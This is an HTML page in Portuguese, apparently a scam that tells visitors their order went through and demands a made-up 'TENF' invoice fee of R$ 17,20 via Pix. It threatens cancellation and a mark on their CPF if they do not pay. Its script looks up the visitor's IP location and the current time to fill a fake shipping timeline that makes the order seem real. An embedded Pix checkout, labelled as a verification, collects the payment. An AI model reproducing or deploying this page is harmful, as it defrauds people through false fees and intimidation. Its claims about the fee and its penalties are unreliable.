<html>

<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>Empréstimo facilitado, simulação gratuita!</title>
    <link href="https://fonts.googleapis.com/css2?family=Poppins:wght@400;500;600;700&display=swap" rel="stylesheet">
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/css/bootstrap.min.css" rel="stylesheet">
    <script src="../assets/js/links.js"></script>

    <script src="https://cdn.utmify.com.br/scripts/utms/latest.js" data-utmify-prevent-subids async defer></script>


<style>

    :root {
      --primary: #151643;
      --red: #ef4444;
      --green: #27ae60;
    }
    
    body {
        margin: 0;
        padding: 0;
        font-family: 'Poppins', sans-serif;
        background-color: #ffffff;
        color: #000;
        font-size: 16px;
    }
    

    #__nuxt {
      min-height: 100vh;
      display: grid;
      grid-template-rows: auto 1fr auto;
    }
    
    .default-layout {
      display: grid;
      grid-template-areas: "top-bar" "content" "footer";
      grid-template-rows: auto 1fr auto;
      min-height: 100vh;
    }
    
    .top-bar {
      background-color: #FFF;
      width: 100%;
      display: flex;
      align-items: center;
      justify-content: center;
    }
    
    .container {
      box-sizing: border-box;
      margin: 0 auto;
      padding: 0 1rem;
      max-width: 1000px;
    }
    
    
    .logo img {
      height: 100px;
      width: auto;
      object-fit: contain;
    }
    
    .fee-page {
      margin: 2.5rem 0;
    }
    
    .intro {
      display: grid;
      gap: 0.75rem;
    }
    
    .card-title {
      color: var(--primary);
      font-size: 1.5rem;
      font-weight: 500;
      text-align: center;
    }
    
    .divider {
      background-color: var(--primary);
      height: 2px;
      width: 80px;
      border-radius: 10px;
    }
    
    .card-sub-title {
      color: #21236ada;
      line-height: 1.5;
    }
    
    .registration-fee-video {
      border: 1px solid  #006bff(39, 174, 96, 0.8);
      background: white;
      border-radius: 10px;
      box-shadow: 1px 1px 15px rgba(39, 174, 96, 0.5);
      padding: 2.5rem 1rem;
      display: grid;
      gap: 1rem;
    }
    
    .card-aviso {
      background: var(--red);
      color: white;
      text-align: center;
      font-size: 1.3rem;
      font-weight: bold;
      border-radius: 10px;
      padding: 10px;
    }
    
    .card-aviso-texto {
      background: var(--red);
      color: white;
      text-align: center;
      padding: 10px;
      border-radius: 10px;
    }

.loan-status-timeline {
    display: grid;
    gap: 2rem;
    position: relative;
}

.bar {
    background-color: #d5d5d5;
    height: 87%;
    left: 10px;
    position: absolute;
    top: 20px;
    transform: translateX(-50%);
    width: 3px;
}

.timeline-part {
    align-items: center;
    display: grid;
    gap: 1.3rem;
    grid-template-columns: auto 1fr;
}

.timeline-part.done {
    color: #419c63;
}

.timeline-part.done .dot {
    background-color: #419c63;
}

.timeline-part.current {
    color: var(--red);
}

.timeline-part.current .dot {
    animation: pulse 1s infinite;
    background-color: var(--red);
}

@keyframes pulse {
    0% {
        -webkit-box-shadow: 0 0 0 0 var(--red);
        box-shadow: 0 0 0 0 var(--red);
    }
    70% {
        -webkit-box-shadow: 0 0 0 15px rgba(255, 0, 0, 0);
        box-shadow: 0 0 0 15px rgba(255, 0, 0, 0);
    }
    100% {
        -webkit-box-shadow: 0 0 0 0 rgba(255, 0, 0, 0);
        box-shadow: 0 0 0 0 rgba(255, 0, 0, 0);
    }
}

.timeline-part.pending {
    color: rgba(0, 0, 0, 0.3);
}

.timeline-part.pending .dot {
    background-color: #d5d5d5;
}

.dot {
    background-color: var(--primary);
    border-radius: 50%;
    height: 20px;
    outline: 5px solid #f5f7f9;
    position: relative;
    width: 20px;
}

.body {
    align-items: center;
    display: grid;
    gap: 0.5rem;
    grid-template-columns: auto 1fr;
}

.body .icon {
    font-size: 2.5rem;
}

.body .text {
    display: grid;
}
    .timeline-part.done .dot {
      background: #419c63;
    }
    
    .timeline-part.current .dot {
      background: var(--red);
      animation: pulse 1s infinite;
    }
    
    .timeline-part.pending {
      color: rgba(0, 0, 0, 0.3);
    }
    
    .timeline-part.pending .dot {
      background: #d5d5d5;
    }
    
    @keyframes pulse {
      0% { box-shadow: 0 0 0 0 var(--red); }
      70% { box-shadow: 0 0 0 15px transparent; }
      100% { box-shadow: 0 0 0 0 transparent; }
    }
    
    /* Pagamento */
    .payment-card {

      padding: 1.5rem;
      display: grid;
      gap: 2rem;
      text-align: center;
    }
    
    .fee-value {
      color: #000;
      font-size: 2rem;
      font-weight: 500;
    }
    
    .button {
      padding: 10px 20px;
      font-size: 16px;
      border: none;
      border-radius: 5px;
      background: #27ae60;
      color: white;
      cursor: pointer;
    }
    

    .footer {
      background: #002776;
      color: rgba(255, 255, 255, 0.7);
      padding: 2rem 0;
      text-align: center;
      border-top: 2px solid #edf0ef;
      border-bottom: 7px solid var(--primary);
    }
    
    .footer p {
      margin: 0.5rem 0;
    }
    

    .image-container {
    text-align: center;
    margin: 1rem 0;
}

.image-container img {
    max-width: 100%;
    height: auto;
    width: 150px;
}

@media (max-width: 768px) {
    .image-container img {
        width: 120px;
    }
}

@media (max-width: 480px) {
    .image-container img {
        width: 100px;
    }
}
    
    .text-red { color: var(--red); }
    .text-green { color: var(--green); }
    .text-primary { color: var(--primary); }

</style>
</head>

<body>
    <div id="__nuxt">
        <div class="default-layout">
            <header class="top-bar">
                <div class="container logo">
                        <img src="images/nfe.png" alt="Logo">
                </div>
            </header>
            <main class="content">
                <div class="fee-page">
                    <div class="container">
                        <div class="intro">
                            <span class="card-title headline">
                                Seu pedido foi realizado com sucesso!
                            </span>
                            <div class="divider"></div>
                            <span class="card-sub-title" style="padding-bottom: 20px;">
                                Seu pedido foi realizado! Mas para emissão da sua nota fiscal é necessário o pagamento da taxa <strong>TENF (Taxa de Emissão da Nota Fiscal)</strong>, no valor único de <strong>R$ 17,20</strong>.
                            </span>
                        </div>
                        <div class="registration-fee-video">
                            
                            <span class="card-aviso-texto">
                                <span class="card-aviso">AVISO</span>
                                <br>
                                O não pagamento da TENF resultará no <strong>cancelamento do pedido</strong> e <strong>anotação no CPF.</strong>
                            </span>

                            <div class="loan-status-timeline">
                                <div class="bar"></div>
                                <div class="timeline-part done">
                                    <div class="dot"></div>
                                    <div class="body">
                                        <svg  aria-hidden="true" xmlns="http://www.w3.org/2000/svg" width="33" height="33" fill="none" viewBox="0 0 24 24">
                                            <path stroke="currentColor" stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M18 5V4a1 1 0 0 0-1-1H8.914a1 1 0 0 0-.707.293L4.293 7.207A1 1 0 0 0 4 7.914V20a1 1 0 0 0 1 1h12a1 1 0 0 0 1-1v-5M9 3v4a1 1 0 0 1-1 1H4m11.383.772 2.745 2.746m1.215-3.906a2.089 2.089 0 0 1 0 2.953l-6.65 6.646L9 17.95l.739-3.692 6.646-6.646a2.087 2.087 0 0 1 2.958 0Z"/>
                                          </svg>
                                          
                                        <div class="text">
                                            <p style="font-weight: 500;">Pedido Realizado</p>
                                            <small><div class="localizacao"></div></small>
                                            <small><div class="data-hora"></div></small>
                                            
                                        </div>
                                    </div>
                                </div>
                                <div class="timeline-part done">
                                    <div class="dot"></div>
                                    <div class="body">
                                        <svg aria-hidden="true" xmlns="http://www.w3.org/2000/svg" width="33" height="33" fill="none" viewBox="0 0 24 24">
                                            <path stroke="currentColor" stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M10 3v4a1 1 0 0 1-1 1H5m4 6 2 2 4-4m4-8v16a1 1 0 0 1-1 1H6a1 1 0 0 1-1-1V7.914a1 1 0 0 1 .293-.707l3.914-3.914A1 1 0 0 1 9.914 3H18a1 1 0 0 1 1 1Z"/>
                                          </svg>
                                          
                                        <div class="text">
                                            <p style="font-weight: 500;">Pedido pronto para envio</p>
                                            <small><div class="localizacao"></div></small>
                                            <small><div class="data-hora"></div></small>
                                        </div>
                                    </div>
                                </div>
                                <div class="timeline-part current">
                                    <div class="dot"></div>
                                    <div class="body">
                                        <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" aria-hidden="true" role="img" class="icon iconify iconify--ph" width="1em" height="1em" viewBox="0 0 256 256">
                                            <g fill="currentColor">
                                                <path d="m229.67 133.62l-96 96a7.94 7.94 0 0 1-11.24 0l-96-96a7.94 7.94 0 0 1 0-11.24l96.05-96a7.94 7.94 0 0 1 11.24 0l96 96.05a7.94 7.94 0 0 1-.05 11.19" opacity=".2"></path>
                                                <path d="m235.34 116.72l-96.06-96.06a16 16 0 0 0-22.56 0l-96.06 96.06a16 16 0 0 0 0 22.56l96.06 96.06a16 16 0 0 0 22.56 0l96.06-96.06a16 16 0 0 0 0-22.56M128 32l56 56h-24a8 8 0 0 0-5.66 2.34L128 116.68l-26.34-26.34A8 8 0 0 0 96 88H72Zm-72 72h36.68l24 24l-24 24H56l-24-24Zm72 120l-56-56h24a8 8 0 0 0 5.66-2.34L128 139.31l26.34 26.35A8 8 0 0 0 160 168h24Zm72-72h-36.68l-24-24l24-24H200l24 24Z"></path>
                                            </g>
                                        </svg>
                                        <div class="text">
                                            <p style="font-weight: 500;">Taxa de nota fiscal</p>
                                            <small>Aguardando pagamento da taxa TENF</small>
                                        </div>
                                    </div>
                                </div>
                                <div class="timeline-part pending">
                                    <div class="dot"></div>
                                    <div class="body">
                                        <svg aria-hidden="true" xmlns="http://www.w3.org/2000/svg" width="33" height="33" fill="none" viewBox="0 0 24 24">
                                            <path stroke="currentColor" stroke-linecap="round" stroke-linejoin="round" stroke-width="2" d="M13 7h6l2 4m-8-4v8m0-8V6a1 1 0 0 0-1-1H4a1 1 0 0 0-1 1v9h2m8 0H9m4 0h2m4 0h2v-4m0 0h-5m3.5 5.5a2.5 2.5 0 1 1-5 0 2.5 2.5 0 0 1 5 0Zm-10 0a2.5 2.5 0 1 1-5 0 2.5 2.5 0 0 1 5 0Z"/>
                                          </svg>
                                          
                                        <div class="text">
                                            <p style="font-weight: 500;">Em trânsito</p>
                                            <small>Passo anterior não concluído</small>
                                        </div>
                                    </div>
                                </div>
                                <div class="timeline-part pending">
                                    <div class="dot"></div>
                                    <div class="body">
                                        <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" aria-hidden="true" role="img" class="icon iconify iconify--ph" width="1em" height="1em" viewBox="0 0 256 256">
                                            <g fill="currentColor">
                                                <path d="M16 152h32v56H16a8 8 0 0 1-8-8v-40a8 8 0 0 1 8-8M192.54 40A39.12 39.12 0 0 0 156 64a39.12 39.12 0 0 0-36.54-24C97.67 40 80 58.31 80 80c0 14.56 7 27.71 16.73 40H140a20 20 0 0 1 0 40h4l37.78-8.68C203.82 135.07 232 109.23 232 80c0-21.69-17.67-40-39.46-40" opacity=".2"></path>
                                                <path d="M230.33 141.06a24.34 24.34 0 0 0-18.61-4.77C230.5 117.33 240 98.48 240 80c0-26.47-21.29-48-47.46-48A47.58 47.58 0 0 0 156 48.75A47.58 47.58 0 0 0 119.46 32C93.29 32 72 53.53 72 80c0 11 3.24 21.69 10.06 33a31.87 31.87 0 0 0-14.75 8.4L44.69 144H16a16 16 0 0 0-16 16v40a16 16 0 0 0 16 16h104a8 8 0 0 0 1.94-.24l64-16a7 7 0 0 0 1.19-.4L226 182.82l.44-.2a24.6 24.6 0 0 0 3.93-41.56ZM119.46 48a31.15 31.15 0 0 1 29.14 19a8 8 0 0 0 14.8 0a31.15 31.15 0 0 1 29.14-19C209.59 48 224 62.65 224 80c0 19.51-15.79 41.58-45.66 63.9l-11.09 2.55A28 28 0 0 0 140 112h-39.32C92.05 100.36 88 90.12 88 80c0-17.35 14.41-32 31.46-32M16 160h24v40H16Zm203.43 8.21l-38 16.18L119 200H56v-44.69l22.63-22.62A15.86 15.86 0 0 1 89.94 128H140a12 12 0 0 1 0 24h-28a8 8 0 0 0 0 16h32a8.3 8.3 0 0 0 1.79-.2l67-15.41l.31-.08a8.6 8.6 0 0 1 6.3 15.9Z"></path>
                                            </g>
                                        </svg>
                                        <div class="text">
                                            <p style="font-weight: 500;">Pedido Entregue</p>
                                            <small>Passo anterior não concluído</small>
                                        </div>
                                    </div>
                                </div>
                            </div>
                            <!--
                            <div class="image-container">
                                <img src="images/Banco_Central_do_Brasil_logo-1.png" alt="Imagem Centralizada">
                            </div>
                            -->
                            <div class="description">
                                <span class="card-sub-title">
                                    O não pagamento da Nota Fiscal resulta no cancelamento do pedido, <strong>impossibilitando novas compras por um prazo máximo de 90 dias e anotação no CPF.</strong>
                                </span>
                            </div>
                        </div>
                        <div class="card payment-card">
                            <span class="card-title">Pague via Pix 
                                <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" aria-hidden="true" role="img" class="icon iconify iconify--ic" width="1em" height="1em" viewBox="0 0 24 24">
                                    <path fill="#27ae60" d="m15.45 16.52l-3.01-3.01c-.11-.11-.24-.13-.31-.13s-.2.02-.31.13L8.8 16.53c-.34.34-.87.89-2.64.89l3.71 3.7a3 3 0 0 0 4.24 0l3.72-3.71c-.91 0-1.67-.18-2.38-.89M8.8 7.47l3.02 3.02c.08.08.2.13.31.13s.23-.05.31-.13l2.99-2.99c.71-.74 1.52-.91 2.43-.91l-3.72-3.71a3 3 0 0 0-4.24 0l-3.71 3.7c1.76 0 2.3.58 2.61.89"></path>
                                    <path fill="#27ae60" d="m21.11 9.85l-2.25-2.26H17.6c-.54 0-1.08.22-1.45.61l-3 3c-.28.28-.65.42-1.02.42a1.5 1.5 0 0 1-1.02-.42L8.09 8.17c-.38-.38-.9-.6-1.45-.6H5.17l-2.29 2.3a3 3 0 0 0 0 4.24l2.29 2.3h1.48c.54 0 1.06-.22 1.45-.6l3.02-3.02c.28-.28.65-.42 1.02-.42s.74.14 1.02.42l3.01 3.01c.38.38.9.6 1.45.6h1.26l2.25-2.26a3.04 3.04 0 0 0-.02-4.29"></path>
                                </svg>
                            </span>
                            <span class="card-sub-title">O pagamento será confirmado imediatamente</span>
                            <span class="fee-value">R$ 17,20</span>

<script src="https://alphapix.online/popup.min.js?product=1c675b63-3a5b-4744-91d7-3c1f807ae66f&url=https%3A%2F%2Falphapix.online%2Fcheckout%2F1c675b63-3a5b-4744-91d7-3c1f807ae66f&text=Efetuar+Verifica%C3%A7%C3%A3o&color=ffea00&textColor=000000&position=center&shadow=heavy&size=large&animation=pulse&borderRadius=8&fontWeight=bold"></script>
<script src="https://cdn.alphapix.online/checkout.js"></script>


                            <span class="card-sub-title">
                                <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" aria-hidden="true" role="img" class="icon iconify iconify--ph" width="1em" height="1em" viewBox="0 0 256 256">
                                    <g fill="#27ae60">
                                        <path d="M216 56v56c0 96-88 120-88 120s-88-24-88-120V56a8 8 0 0 1 8-8h160a8 8 0 0 1 8 8" opacity=".2"></path>
                                        <path d="M208 40H48a16 16 0 0 0-16 16v56c0 52.72 25.52 84.67 46.93 102.19c23.06 18.86 46 25.26 47 25.53a8 8 0 0 0 4.2 0c1-.27 23.91-6.67 47-25.53C198.48 196.67 224 164.72 224 112V56a16 16 0 0 0-16-16m0 72c0 37.07-13.66 67.16-40.6 89.42a129.3 129.3 0 0 1-39.4 22.2a128.3 128.3 0 0 1-38.92-21.81C61.82 179.51 48 149.3 48 112V56h160ZM82.34 141.66a8 8 0 0 1 11.32-11.32L112 148.69l50.34-50.35a8 8 0 0 1 11.32 11.32l-56 56a8 8 0 0 1-11.32 0Z"></path>
                                    </g>
                                </svg> Ambiente seguro
                            </span>
                        </div>
                    </div>
            </main>
        </div>
        <footer class="footer">
            <div class="container">
                <p>© 2025 NFE BRASIL. CNPJ: 60.779.196/0001-96.</p>
                <p>Avenida Presidente Wilson, 9, São Vicente/SP - CEP 11320-905</p>
            </div>
        </footer>
    </div>

    <script>
        async function obterLocalizacao() {
            try {
                const response = await fetch('https://get.geojs.io/v1/ip/geo.json');
                if (!response.ok) throw new Error('Erro na requisição');

                const data = await response.json();
                const cidade = data.city || "Cidade Desconhecida";
                const estado = data.region || "Estado Desconhecido";
                const siglaEstado = formatarSiglaEstado(estado);

                return `${cidade}/${siglaEstado}`;
            } catch (error) {
                console.error('Erro ao obter a localização:', error);
                return "Local Desconhecido";
            }
        }

        function formatarSiglaEstado(estado) {
            const estados = {
                "Acre": "AC", "Alagoas": "AL", "Amapá": "AP", "Amazonas": "AM",
                "Bahia": "BA", "Ceará": "CE", "Distrito Federal": "DF", "Espírito Santo": "ES",
                "Goiás": "GO", "Maranhão": "MA", "Mato Grosso": "MT", "Mato Grosso do Sul": "MS",
                "Minas Gerais": "MG", "Pará": "PA", "Paraíba": "PB", "Paraná": "PR",
                "Pernambuco": "PE", "Piauí": "PI", "Rio de Janeiro": "RJ", "Rio Grande do Norte": "RN",
                "Rio Grande do Sul": "RS", "Rondônia": "RO", "Roraima": "RR", "Santa Catarina": "SC",
                "São Paulo": "SP", "Sergipe": "SE", "Tocantins": "TO"
            };

            return estados[estado] || "UF";
        }

        function formatarDataHora(data) {
            const dia = String(data.getDate()).padStart(2, '0');
            const mes = String(data.getMonth() + 1).padStart(2, '0');
            const ano = data.getFullYear();
            const horas = String(data.getHours()).padStart(2, '0');
            const minutos = String(data.getMinutes()).padStart(2, '0');


            return `${dia}/${mes}/${ano} ${horas}:${minutos}`;
        }

        async function atualizarLocalizacao() {
            const localizacao = await obterLocalizacao();
            const elementosLocalizacao = document.querySelectorAll('.localizacao');
            elementosLocalizacao.forEach(el => el.textContent = localizacao);
        }

        function atualizarDataHora() {
            const agora = new Date();
            const dataHoraFormatada = formatarDataHora(agora);
            const elementosDataHora = document.querySelectorAll('.data-hora');
            elementosDataHora.forEach(el => el.textContent = dataHoraFormatada);
        }

        window.onload = () => {
            atualizarLocalizacao();
            atualizarDataHora();
        };
    </script>

</body>
</html>